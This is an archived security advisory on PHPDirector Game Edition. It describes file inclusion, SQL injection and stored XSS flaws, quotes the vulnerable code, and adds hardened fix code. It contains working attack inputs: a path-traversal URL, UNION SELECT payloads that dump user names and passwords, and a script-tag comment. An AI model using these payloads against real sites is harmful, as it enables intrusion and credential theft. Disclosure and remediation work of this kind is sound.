PHPDirector Game Edition Cross Site Scripting / Local File Inclusion / SQL Injection

2010-01-07T00:00:00
ID PACKETSTORM:84876
Type packetstorm
Reporter Zer0 Thunder
Modified 2010-01-07T00:00:00

Description

# Exploit Title: PHPDirector Game Edition Multiple Vulnerabilities (LFI/SQLi/XSS)
# Date: 2010-01-05  
# Author: Zer0 Thunder  
# Site : http://www.play-online.bzh.be/forum/  
# Software Link: http://www.play-online.bzh.be/forum/download/phpdirectorgameedition.zip  
# Version: v0.1  
# Tested on: Windows XP sp2 [WampServer 2.0i] / LinuxBox ( Ubuntu Server 9.10)  
# CVE :   
# Code :  
  
  
Local File Inclusion
  
header.php vulnerable code
-----------------------------
if(!$_GET["lang"])
{
    include("lang/".config('lang'));
}
else
{
    // the raw query-string value is written to the cookie without validation
    SetCookie("lang",$_GET["lang"]);
    header('Location: ' . $_SERVER['HTTP_REFERER'] );
}
if (!$_COOKIE["lang"])
{
    include("lang/".config('lang'));
}
else
{
    // the cookie value is concatenated straight into the include path,
    // so a traversal sequence reaches include() unchanged
    $lang = $_COOKIE["lang"];
    include("lang/" . $lang . ".inc.php");
}

-------------------------------
  
Exploit :  
http://site.com/path/header.php?lang=[LFI]
  
  
Sample (tested on a Windows box)
http://localhost/phpdirectorgameedition/header.php?lang=../../../../boot.ini%00  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
  
SQL Injection   
  
Page: games.php vulnerable code (line 12, and lines 121-128)
-----------------------------------------
$idc = $_GET["id"];
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if(isset($idc) && is_numeric($idc)){
    // $id is interpolated into the query text instead of being bound as a parameter;
    // mysql_real_escape_string() only escapes quotes, which an unquoted numeric context never needs
    $id = mysql_real_escape_string($idc);
    $result = mysql_query("SELECT * FROM pp_files WHERE id=$id AND `approved` = '1' LIMIT 1") or die(mysql_error());
}else{
    $result = mysql_query("select * from pp_files WHERE approved='1' AND reject='0' order by rand() LIMIT 1") or die(mysql_error());
}
  
-----------------------------------  
## There is also a possible vulnerability on lines 27-57
  
Exploit :  
http://site/games.php?id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--  
http://site/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--  
  
  
Example :   
  
DB Version  
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--  
  
Users  
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--  
  
# The admin username and password are not in the SQL database; they are stored in config.php
# (lines 15-16):
#  
#$cfg["admin_user"] = "admin";   
#$cfg["admin_pass"] = "test";  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
XSS (Cross Site Scripting)

You can even use an XSS shell on this vulnerability.
Go to this page:
  
http://localhost/phpdirectorgameedition/games.php?id=1  
  
In the comment form, enter "<script>alert("XSS")</script>" and submit the comment.
  
Vulnerable code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if(isset($_POST['go']) && !empty($_POST['comment']) && !empty($_POST['nom']))
{
    // addslashes() only escapes quotes for SQL; the comment is stored and later
    // rendered without HTML encoding, so submitted markup persists (stored XSS)
    mysql_query("INSERT INTO pp_comment (file_id, nom, comment,ip) VALUES ('$_POST[id]', '$_POST[nom]','".addslashes($_POST['comment'])."','$ip')");
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
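Hardened forms of the three excerpts above (the header.php language include, the games.php id lookup and the comment output), written as an added example and not code from PHPDirector or from the advisory author. It assumes config('lang') returns the default language file name as in the original header.php, an open mysqli connection $db for games.php, and a constructed allow-list of language files.

```php
<?php
// Added example, not PHPDirector's code: hardened forms of the three excerpts above.
// Assumes config('lang') returns the default language file name as in the original
// header.php, and an open mysqli connection $db for games.php.
// header.php: lang selects from a fixed list of shipped files and never becomes a
// path fragment itself, so "../" or a "%00" terminator cannot reach include().
$allowed_langs = array('en', 'fr');   // constructed list; mirror the real lang/ contents
function resolve_lang($requested, array $allowed)
{
    // accept only a short lowercase token that is also on the allow-list
    if (is_string($requested) && preg_match('/^[a-z]{2,5}$/', $requested) && in_array($requested, $allowed, true)) {
        return $requested;
    }
    return null;   // anything else falls back to the configured default
}
if (isset($_GET['lang'])) {
    $lang = resolve_lang($_GET['lang'], $allowed_langs);
    if ($lang !== null) {
        setcookie('lang', $lang, 0, '/', '', false, true);   // store only the validated value
    }
    header('Location: index.php');   // fixed target instead of the attacker-controlled Referer
    exit;
}
$lang = isset($_COOKIE['lang']) ? resolve_lang($_COOKIE['lang'], $allowed_langs) : null;
if ($lang === null) {
    include 'lang/' . config('lang');
} else {
    include 'lang/' . $lang . '.inc.php';
}

// games.php: bind id as an integer; nothing from the request is concatenated into SQL.
function fetch_game(mysqli $db, $idc)
{
    if (isset($idc) && ctype_digit((string) $idc)) {
        $stmt = $db->prepare("SELECT * FROM pp_files WHERE id = ? AND `approved` = '1' LIMIT 1");
        $id = (int) $idc;
        $stmt->bind_param('i', $id);
    } else {
        $stmt = $db->prepare("SELECT * FROM pp_files WHERE approved = '1' AND reject = '0' ORDER BY RAND() LIMIT 1");
    }
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc();   // get_result() needs the mysqlnd driver
}

// comments: encode on output so a stored "<script>" tag is displayed as text, not run
function show_comment($text)
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}
```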
  
########################################  
# MSN : zer0_thunder@colombohackers.com  
# Email : neonwarlock@live.com  
# Site : LKHackers.com  
# Greetz : To all my friends  
# Note : Proud to be a Sri Lankan  
# Me : Sri Lankan Hacker  
########################################  
  